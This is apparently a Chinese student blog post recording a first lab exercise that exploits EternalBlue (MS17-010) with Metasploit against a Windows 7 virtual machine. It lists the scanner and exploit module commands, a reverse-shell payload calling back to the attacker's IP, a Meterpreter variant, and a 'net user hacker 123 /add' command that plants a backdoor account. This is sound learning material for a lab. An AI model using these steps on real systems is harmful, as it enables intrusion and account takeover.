2er0's Studio.

MSF永恒之蓝(Eternalblue)漏洞利用

Word count: 340Reading time: 1 min
2020/11/15 Share

记第一次网安实验——MSF永恒之蓝(Eternalblue)漏洞利用

测试工具:

1
2
3
1.vmware station15
2.kali linux 2020
3.靶机windows7

实验过程:

1.确定靶机IP,及本机IP地址

lhost:192.168.11.144

ipadd

rhosts:192.168.11.146

ipconfig

2.启动MSF(msfconsole),并查找永恒之蓝的exp等相关信息: search ms17-010

![search ms17-010](search ms17-010.png)

3.测试目标主机是否存在该漏洞(use auxiliary/scanner/smb/smb_ms17_010 or use 1),检测程序,设置靶机IP,自动检测是否其存在永恒之蓝漏洞

测试
可以看出,靶机似乎存在永恒之蓝漏洞
(- Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit))

4.正式攻击,配置exp,设置参数(靶机IP,本机IP,侦听端口等),设置payload(多种选择,看需求吧)

这里用的payload: set payload windows/x64/shell_reverse_tcp
setlhost

  1. set rhosts 192.168.11.146(靶机IP)
  2. set lhost 192.168.11.144(本机IP),靶机反向连接本机时需要用到。
  3. set payload windows/x64/shell_reverse_tcp 
  4. exploit || run

漏洞利用

5.拿到shell,试着添加用户组:net user hacker 123 /add

shell权限
在cmd进行其他操作……


另一个payload(set payload windows/x64/meterpreter/reverse_tcp)的结果:

可以获取靶机的screenshot及用户组账户,密码:

靶机用户

此图非彼图,这是攻击机漏洞利用后远程使用screenshot命令截的图。

还得学一下meterpreter这个模块的用法。

CATALOG
  1. 1. 记第一次网安实验——MSF永恒之蓝(Eternalblue)漏洞利用
  2. 2. 测试工具:
    1. 2.1. 实验过程:
      1. 2.1.1. 1.确定靶机IP,及本机IP地址
      2. 2.1.2. 2.启动MSF(msfconsole),并查找永恒之蓝的exp等相关信息: search ms17-010
      3. 2.1.3. 3.测试目标主机是否存在该漏洞(use auxiliary/scanner/smb/smb_ms17_010 or use 1),检测程序,设置靶机IP,自动检测是否其存在永恒之蓝漏洞
      4. 2.1.4. 4.正式攻击,配置exp,设置参数(靶机IP,本机IP,侦听端口等),设置payload(多种选择,看需求吧)
      5. 2.1.5. 5.拿到shell,试着添加用户组:net user hacker 123 /add
    2. 2.2. 另一个payload(set payload windows/x64/meterpreter/reverse_tcp)的结果: